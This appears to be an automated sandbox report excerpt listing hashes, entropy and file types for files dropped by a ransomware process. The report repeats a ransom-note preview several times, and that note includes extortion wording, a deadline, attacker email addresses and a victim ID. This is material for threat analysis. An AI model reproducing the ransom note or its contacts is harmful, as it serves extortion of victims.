                                                                                                    Entropy (8bit):7.859146072650734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:a2fO9kM5TnrNv66ZuDquxnFi+MyYEzVNG1oYofSMIm:akO9p5TJXuDquNjMyvYFYSMx
                                                                                                    MD5:A1A7E95F43D50B37D381A5105A007BF8
                                                                                                    SHA1:FAA57DCE084F2AF040652B84D4908ADAA14E9BFB
                                                                                                    SHA-256:6286605038B071AE99715453BB62DFBCF2EE2417E8FDC40DEFDA63D940AA5B58
                                                                                                    SHA-512:D8F003E29BC0252B5B6BFEA9266BEE8F96347D9F3A15104454C4CC7257940C0BC1699E78D4D0076FB721D1CBF60A7D5362282BBF79B7F8BB20125DE94A309649
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.860218066670778
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:21FqcU1dQEocp/ccv79hO/1aU5Nn50vOAXi5FmlsPIj+ZD8XvDs2UrmQWV:21EcU1dH9cm1Ur50vOAXi57Z8XvoNaT
                                                                                                    MD5:AA5853D52FEFE7743E5272F676715BB0
                                                                                                    SHA1:E5D118BA02EFCA9D0FA510890A535C872C464332
                                                                                                    SHA-256:8BF558348100045A2E76AD034D371E7576CA28E8C9B448560259404AB32ECB14
                                                                                                    SHA-512:95ED05F062B3732B42EB2092B079C101429BB4957383BADAD8B921DB87292E7D7DA01E6E08C9C95E83E568B67223C1AEEDF0D77F72704E3A37E652E828E12076
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.82455674286558
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gtajUjR1mZHtpk1e1f0uGtvblNazHfx2D2JumZotdjMeUXAoCn+cQYv:qKo0ZHtGe1MuEbCzBDZE8NHcV
                                                                                                    MD5:AED4FADBAF45892DF28D737B9E985B28
                                                                                                    SHA1:BBAEC48753895544B4AA2C9B82163587B566FD18
                                                                                                    SHA-256:E299DFBA2B36CBE30987DDD76A0813A32877CE4EDE4F97A87E1E873898E74E5F
                                                                                                    SHA-512:D1052C13A671001C5C617C34EA4953CB27076786963FF1A237FF4DBA843CEBEF4E7CF075BE6581F21FBBC2EA4052F59006CFAE200122765A9A55A4507E0EF3D9
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.826145775472628
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:cO7tyoHRfAQKPnzQWiTy8l0NrSG0j90OhILbZDweX6TuTNre+VoiDZ:cocmfzKPn+yBJSG0GCSYWzVp
                                                                                                    MD5:DDCBC8B7B36FEDEEAAF6C218B919AFF9
                                                                                                    SHA1:67EF2E33B9AF0AE75F5BA965B8F72AF0A7EFFCF8
                                                                                                    SHA-256:9CAABC5589E9E61E22FF942F2AC47D77DF07227667E616444C4F77044164D55A
                                                                                                    SHA-512:8AEC3EDD66E3A42339441A1CC74BC96C9C1549E4388DEA43E42ADF6D02F7609F3AD85B99EF842F6523D78577020F00C16BFF4CA28400515CAAF477C302A449BB
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.845870970984708
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Os2CbZEIcLpX3SKpQ8xdhRI2nHlvJJnUtEzYWsRfN8jKHyo2QsC6U+X2eg:OriK9PAUFfyEzYWsRV8jKHlJuU6A
                                                                                                    MD5:9195287E62C04A64B51983F23C5E0AAD
                                                                                                    SHA1:8EEAD511966DBAFFD3127F7C46900F6DBE8BAEC2
                                                                                                    SHA-256:6369A236FA3AE353C2EFBF1FEE2737EAC9425753547533CB55145B564448820E
                                                                                                    SHA-512:1ABC528258A61C5FDFADEF0DD8664688DC0975204F2DCA113FC1118EEAFD86D859D7F4397208AA9784D8F4208576A8537B839625E814741CD01C66A6F58705C8
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.849815362490143
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:TrJkYuNFI3IS5G3BrMMW0vZzSCoMgTvi+DXngm:HsFT1EuSF1TvXDXP
                                                                                                    MD5:B879FCF46D134E405FF23073A1CD3A2A
                                                                                                    SHA1:10433583C9B88595052266376E01D2BC95C8B2DA
                                                                                                    SHA-256:514BC0CEEA528ABC564211BDD47E47E1903E82DBD5362BCFC9CA4289108DEE55
                                                                                                    SHA-512:5E23D507094CA5E92D19F9D59BC9010ACE405DD4CA9FDCDE354F3176D89F744E7EA155E7293E739F3CCCB468BE574048F2981D50FD9D7E072343C5850180DC48
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.838890259300053
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:1KJUmacvlyAGLX7Q3CADmfbJXszgimTFin+dgYrRuoiPnlXJhS081H:1KePcvlnVXmfbJXsMdFi0gYrRuVh90H
                                                                                                    MD5:114710DA38C0D6F6B6E394214D0B135B
                                                                                                    SHA1:F8DDC0C830BFEBF6BAE75B378C8F08A4DE8B99B4
                                                                                                    SHA-256:C58C40209E3E3E1229B839A0D2A3C566FF88ECFCF974861089ACD7241EDD59BE
                                                                                                    SHA-512:A5CA4586DF7B9B6982995DF130B698A92D17DF6A958714E19B8176B9BE91A25E57B3A6C08362C9687BE330C6CB659AE932F104440EAD997B4C9BB02E68C0B642
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.854780226146903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:1c21izs79fZEQhcVt7gxk9UR6L2e5GEpKwRyWz17l2UDITQPiDYDEn9AvQp0yV:1c2Ys79hE103a2TaLdz17pUavQp0i
                                                                                                    MD5:912E85670DE189C1CEB484B7D1606FB7
                                                                                                    SHA1:F0299A8766C80FA2F10346BA8F2FB4E0FE3FD70B
                                                                                                    SHA-256:20C163A9910293B3364F853B367266603AACDBC1DBFB2555FCB1AF05D9A22D7B
                                                                                                    SHA-512:1E034C0AE32474B3F0431AB9B1AD10635DEA8F6933C11AA87F36C4879762C33A29D0355C9D2D5F1FFADFD786261DC12DC9B213C74D3D74D833917AB5F7904221
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.831606665096791
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:9b9vklYaNDXLOmx+NSz6RfseBfSKm/Wd8Z26xVwFySXqufOyGzl6tvBjWnIFj:9wNc7Rfs0SKk7Z26xiqTyGzl8jhJ
                                                                                                    MD5:B1C3AB67E7EE27E9D1B408ED68B16716
                                                                                                    SHA1:6293C920489A8E9924ADFB18E3C384C19BABBCCA
                                                                                                    SHA-256:BA0F55D8D3BD0FA45ACFE78175645BC801A947978E4AC3C1912EF0EBBCC72F61
                                                                                                    SHA-512:3BD80FED6FBEFC39802832DB253AAC8D00A75339B9D01646A2D8DEE67058EE33B24B530047F8B4674F2CD33A57FB73A195516FC2339D4CA3CA790A23607C0400
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.829830694772968
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ntFJ2hku6V6IfjjE/lXMpvH+Cwp0jjrlV7v10hMyNI11cTNhUpcxmyPrS:V2r6ACMcpvH+CrPrP76bUSTvwchrS
                                                                                                    MD5:DB95900735D8CF0E691FBBF2708CEA16
                                                                                                    SHA1:94F6BE619439648111A0655A2AD2CE04856B7B30
                                                                                                    SHA-256:F9DBC7726F54B4485F7DC05FF7CD89674EEA27C1EA315A34F48493A7C01869F9
                                                                                                    SHA-512:80431F146CC1071AFD80FCD8D2002ACB2734EC7B552E1608479998708D9B4F14E010D5D93584DC72CDE5BFC33D6A25AEABCE01EB56325CAA3439CABDF01BCD54
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.850965793805682
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gQ3juq+bOh79zFbG4OJfQQbvzxg5Kdtm+KjdSfj+Du0:lh39hSbHzxgwdqdSiDT
                                                                                                    MD5:0FD8C68E6E25BB00C836D7AC3E4EC54E
                                                                                                    SHA1:CE47FEFD67DAF83B134DBE9900387422DFF88B0A
                                                                                                    SHA-256:EEA378D94DF73C3F4A0CC6FD72C690095A8A01526E09AC7373F5B2C6B3168E30
                                                                                                    SHA-512:54DA5E6D8259D43A1A7E7441A6C8ECEFD9F977AA5E1C07057EE32E15A779DE15004DEDD20DC5871F87C892F13CC1CDDECFA76BFD99FC6FF31635EDB19BF28532
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.850965793805682
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gQ3juq+bOh79zFbG4OJfQQbvzxg5Kdtm+KjdSfj+Du0:lh39hSbHzxgwdqdSiDT
                                                                                                    MD5:0FD8C68E6E25BB00C836D7AC3E4EC54E
                                                                                                    SHA1:CE47FEFD67DAF83B134DBE9900387422DFF88B0A
                                                                                                    SHA-256:EEA378D94DF73C3F4A0CC6FD72C690095A8A01526E09AC7373F5B2C6B3168E30
                                                                                                    SHA-512:54DA5E6D8259D43A1A7E7441A6C8ECEFD9F977AA5E1C07057EE32E15A779DE15004DEDD20DC5871F87C892F13CC1CDDECFA76BFD99FC6FF31635EDB19BF28532
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8430906568377665
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:scSAlUdD8qnkq8wes2wlXSVeJxOght13cf37RTvOnvwC7o4+S2A7atI8H:scADyq6s2zeJjg317DC7o4gEad
                                                                                                    MD5:69A6F3BBA53F5B97519DFEC7C7EE6886
                                                                                                    SHA1:AEB90922270D6EE8F5B8F255FC838B34901467A2
                                                                                                    SHA-256:C0FBCB452C61452D80C9D69E5DD1FB21287FA00E67B27C40C1104BCEDF0A7D44
                                                                                                    SHA-512:B4B3EE7949954C25322DDAB76E4569C496B358F17F9222D2813CE15EE9D8F19692126305FD3C8B70B0FD4D72FC3121506AA8CCEED8E00ABC7F334DC12D734519
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8442797082568845
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tkPXA2YRArG/gio0n04Nu5ZoX5RinijKy1vOSEI7EV:O4tyG/nn04NuP6Mi+yQZX
                                                                                                    MD5:7079EAF60CF915016AB19A5825F1DF79
                                                                                                    SHA1:6B9FF5F13C0249268481729AED668163D911437E
                                                                                                    SHA-256:7B37B65F7E46149A0588CF4CC245521F831AC9BD00ED7E653126C124253EDF41
                                                                                                    SHA-512:A337E30631501EBD91C1915E0F658DB050D7DA836E2341CCBF2E90D59B4224AB74DFD10611D979A2A070824ADDC1FD1FB99B8E2F1EFD6DF14A6BE8A53B6F8519
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.864935766000018
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gYimv8B1THEBIlCzqgEdwYoBoJ4PL6UYxtxLFtjh1/6CgHEROBlB4mYP:DjE/dl8qBdoBoJsL6U67jz/zQEkzB4vP
                                                                                                    MD5:7A42D87326E31177C09377E252C6D998
                                                                                                    SHA1:1A9AE3A6A68ECFFDC6C588B9D011E904ACFE895C
                                                                                                    SHA-256:F58B0C5D18AE89EF29E3A655D55952F78CDABCD2FD78D1A3F0F34CB58256E161
                                                                                                    SHA-512:F2F55D16A235913AEF1CF87E6C51F0859FE3E8A79BB34FCAF4CE36F497DBD9C7CD253C35EBB55A69E8EAF86164BE38FC163E8EA56D4BABCEC9612594C4C51AC4
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.858277228140458
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:aqRxhJsTSjKCGGIIOHP1HNPLPgQF9Voa3SUjuU8ouInamk:a+h+T3vIwzgQ/VSUaUF65
                                                                                                    MD5:78BAA3E7906FA4DE7F484CBDF816C88E
                                                                                                    SHA1:69B023DC6BD4792C4E52B45D235BD56A3E826DF6
                                                                                                    SHA-256:96ACA4E09B4072A8576D17B25993FD12888B498B1A9C8C498F32F6E1391F5236
                                                                                                    SHA-512:30751D060749796415F3C5A60D9221348B1B9C5963549E2029BA4E7FC4DA3132CC371C0DECC7B0779019749D9128D695913D6E09907A03843BC145DCDFE1D59E
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.844002742756865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3+b2wjuI56kizwk2/Sl9biiDLt38tMI0wb0tefg49r6zkwopJjrb:3+b2EuI563wkOA92i138Zdf99r6/opJL
                                                                                                    MD5:458E0F43146204A2B87F849A6871E559
                                                                                                    SHA1:4C45080D1090D5D4F313FAC0E2D0094CA3E19B00
                                                                                                    SHA-256:B58B9E31AE5E278DE25B113B50E39B8BD099C4E5A62738A65CB54AABC53060DD
                                                                                                    SHA-512:994B26D87374382E8DBA1C3305EB880472321DA749E9514A2D99A4F6C7CF2CE6254D5D2C5795BA5BF865247D7E95B41F483D5FEBD0E32B0BB932A1B7AAED1752
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8446128368895005
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:cj6RAXygHIIJb5QFSdOeRG3zcFDJxZNBKP+t1mEtkcInagR/HYeuf2Q2:XArHI85tVs3oZttgEuDnaLeXQ2
                                                                                                    MD5:D05A1BABB06C784C389EF35FD25A0D94
                                                                                                    SHA1:7A08A787054B6B9E8193FD94C3F71A9197980AC6
                                                                                                    SHA-256:942D2934420C77CD933FBF1A7A34E0C61EE7A2146B7FC4523EE42D775CA90C07
                                                                                                    SHA-512:762025ABD3F22CF1B89B8F91BA6921EFD068894180779D1C0EBCFDD76D46E0FA33A263AAE09106A68542A2B58DA44CE57046408B288C52F3FB011275721C623E
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.844865844792679
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:bOXxFyxwlv487NRxdPW8Vw6L6kZeTnCywh+IhXlCy+F3KegeBCscSXT2/LN:qB4sFgTnCywxh1CysFkvSX85
                                                                                                    MD5:CA63EA8BC38A6B7F6B5CBC5D0C03F788
                                                                                                    SHA1:09E666EA75458A60C7EB5BB3C717B1C14D3F82AC
                                                                                                    SHA-256:9EFBD335D6F756E9629BF9CBADB29489E8F945A5CEFFD8FBA426568BE5D9E6D7
                                                                                                    SHA-512:2D0DA3ABEC3D90B55BF949BAFBD8B5D7286577234AFC454C18E1B485092506713D326BBB0D5DE070720E8A3645CB783D76633FB83DCFF2598DEB5F04F4331E72
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.845810098063647
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:71/0BdYq3+NWAOw5/O9ug0jCezfaRW6Rrx5nvcft1J/N9xZoAhKM9m:BSYbhOYOugCCYfiRrx16V/NXZhR9m
                                                                                                    MD5:CA03451F71406B68740DCD48A217C5A6
                                                                                                    SHA1:88C721FAF5EA28604452BA5B40A84838BE539017
                                                                                                    SHA-256:9F6EF114EA7EF6EEA4ADE9518CB337853E35F930FAC3B2C55E7798FC54C2C948
                                                                                                    SHA-512:130B43CCA2CFA35CB124D88A4FBD1A8259B789D9B2D3A0D3F67056FFA772B6F3B71820DDAD371BCF3CD567BAD582EF745704C1772559A7852CD49955CBB799D0
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.862491139073884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:cvCLflHg6k0HMeDkmSuetya1UkPeBG8Oles1ie4EKUdkxUAAj67oc1I:UCLBw0HXDkmSbxPeBIEs1ipAQAoO
                                                                                                    MD5:49F86627528319A1C9FED4FEC0418A8B
                                                                                                    SHA1:0443242B36566F086229E9F6E89A93729CA7D6A5
                                                                                                    SHA-256:143F6D5AA971F7138ECBFBDEC58EF13CEC4A59E7989EA34604E820D3A3B4E780
                                                                                                    SHA-512:27BC6939605FDD33ADE3C831A98EB4880F6227D7355CFDCF71A738EF2CD48406A8D19327B0CCDC34F3F69026BFA340083CDE6D6F17C4D9A2F8E99AFAD5B97EE5
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.867229189730292
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:i4epnedz1olkaj37lwxMhqS5GI7r7rBWLmblOXnqu0ypVjSzz3Yuhe:iVJRSaj3Jd5GIP7rBWLWOXqE/jSzzouQ
                                                                                                    MD5:BF61BB77E4FC00FFD951F70F7D971F00
                                                                                                    SHA1:7EED2064C3A07FE17BB112637C8E698571CF2737
                                                                                                    SHA-256:208469CE6922A7B239F02D4A55F5B32F94664F0C89687C8BDC2EB8EA018479E7
                                                                                                    SHA-512:F8F283162D79CE72CDF7082B4E8C53F21D4E4AA9504331303341EC39C1AF8450CBF2B2D1D77123718A4D069CC44D79E95BE28032869D90B987B0441DF12886A1
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8598632275053735
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:NSlPfmeSVHLcV6UNhanrJh58U50dBvxMA/gUKUMfK8QCBLc8AE:swVgV6UNhmrJXj0rVZKJy8QCNc8x
                                                                                                    MD5:744B1408363F6A29C6AFCEFB55E8DDE4
                                                                                                    SHA1:0A8E067B612DC5BFB6376A63BC24EA192372C086
                                                                                                    SHA-256:78D65CBF9FBBD611A8C2BEB611F5163A758F7AF254D3FB160AED0BBC9EC53337
                                                                                                    SHA-512:A31C3DC3187D202755A7F918D949720F5E3001749100727FED51DBD904E761CC4D969DCAF394CF95438DCB74BA481916513F6C84E8147ACF2FF6C0A564077348
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
